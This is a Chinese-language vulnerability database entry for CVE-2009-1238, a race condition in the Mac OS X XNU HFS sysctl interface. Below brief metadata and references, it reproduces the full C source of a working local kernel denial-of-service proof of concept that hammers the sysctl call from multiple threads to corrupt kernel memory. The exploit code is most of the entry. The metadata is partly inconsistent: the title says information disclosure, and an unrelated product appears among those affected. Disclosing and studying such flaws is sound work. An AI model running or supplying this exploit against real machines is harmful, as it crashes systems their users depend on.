Apple Mac OS X 'HFS_SET_PKG_EXTENSIONS' 多个本地信息泄露漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117500 漏洞类型 竞争条件
发布时间 2009-03-23 更新时间 2009-04-02
CVE编号 CVE-2009-1238 CNNVD-ID CNNVD-200904-050
漏洞平台 OSX CVSS评分 7.2
|漏洞来源
https://www.exploit-db.com/exploits/8265
https://www.securityfocus.com/bid/80605
https://cxsecurity.com/issue/WLB-2009040110
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200904-050
|漏洞详情
AppleMacOSX10.5.6及之前版本的平台上的XNU1228.8.20及之前版本中的HFSsysctl界面存在多个本地信息泄露漏洞。本地用户可以通过在多个threads中同时执行同一个HFS_SET_PKG_EXTENSIONS代码路径,来引起拒绝服务攻击(内存破坏)。该问题之所以产生,是因为对全局变量缺乏互斥锁定。
|漏洞EXP
/* xnu-vfssysctl-dos.c
 *
 * Copyright (c) 2008 by <mu-b@digit-labs.org>
 *
 * Apple MACOS X xnu <= 1228.x local kernel DoS POC
 * by mu-b - Wed 19 Nov 2008
 *
 * - Tested on: Apple MACOS X 10.5.5 (xnu-1228.8.20~1/RELEASE_I386)
 *
 *    - Private Source Code -DO NOT DISTRIBUTE -
 * http://www.digit-labs.org/ -- Digit-Labs 2008!@$!
 */

#include <stdio.h>
#include <stdlib.h>

#include <hfs/hfs_mount.h>
#include <pthread.h>
#include <string.h>
#include <sys/mount.h>
#include <sys/types.h>
#include <sys/sysctl.h>
#include <unistd.h>

void
hammer (void *arg)
{
  char buf[1024 * (255 + 1)];
  int n, name[6];

  memset (buf, 0, sizeof buf);

  while (1)
    {
      name[0] = CTL_VFS;
      name[1] = 17;
      name[2] = HFS_SET_PKG_EXTENSIONS;
      name[3] = (int) buf;
      name[4] = 1024;
      name[5] = (rand () % 254) + 1;
      n = sysctl (name, 6, NULL, NULL, NULL, 0);

      usleep(10);
    }
}

int
main (int argc, char **argv)
{
  int i, n, tid;

  printf ("Apple MACOS X xnu <= 1228.x local kernel DoS PoC\n"
          "by: <mu-b@digit-labs.org>\n"
          "http://www.digit-labs.org/ -- Digit-Labs 2008!@$!\n\n");

  for (i = 0; i < 4; i++)
    {
      n = pthread_create (&tid, NULL, hammer, NULL);
      if (n < 0)
        {
          fprintf (stderr, "failed creating hammer thread\n");
          return (EXIT_FAILURE);
        }
    }

  while (1)
    sleep (1);

  /* not reached! */
  return (EXIT_SUCCESS);
}

// milw0rm.com [2009-03-23]
|受影响的产品
Cosmicperl Directory Pro 10.0.3 Apple Mac OS X Server 10.5.6 Apple Mac OS X Server 10.5.5 Apple Mac OS X Server 10.5.4 Apple Mac OS X Server 10.5.3 Apple Mac OS X Server
|参考资料

来源:BID
名称:34202
链接:http://www.securityfocus.com/bid/34202
来源:MILW0RM
名称:8265
链接:http://www.milw0rm.com/exploits/8265
来源:MISC
链接:http://www.informationweek.com/news/hardware/mac/showArticle.jhtml?articleID=216401181
来源:MISC
链接:http://www.digit-labs.org/files/exploits/xnu-vfssysctl-dos.c
来源:SECUNIA
名称:34424
链接:http://secunia.com/advisories/34424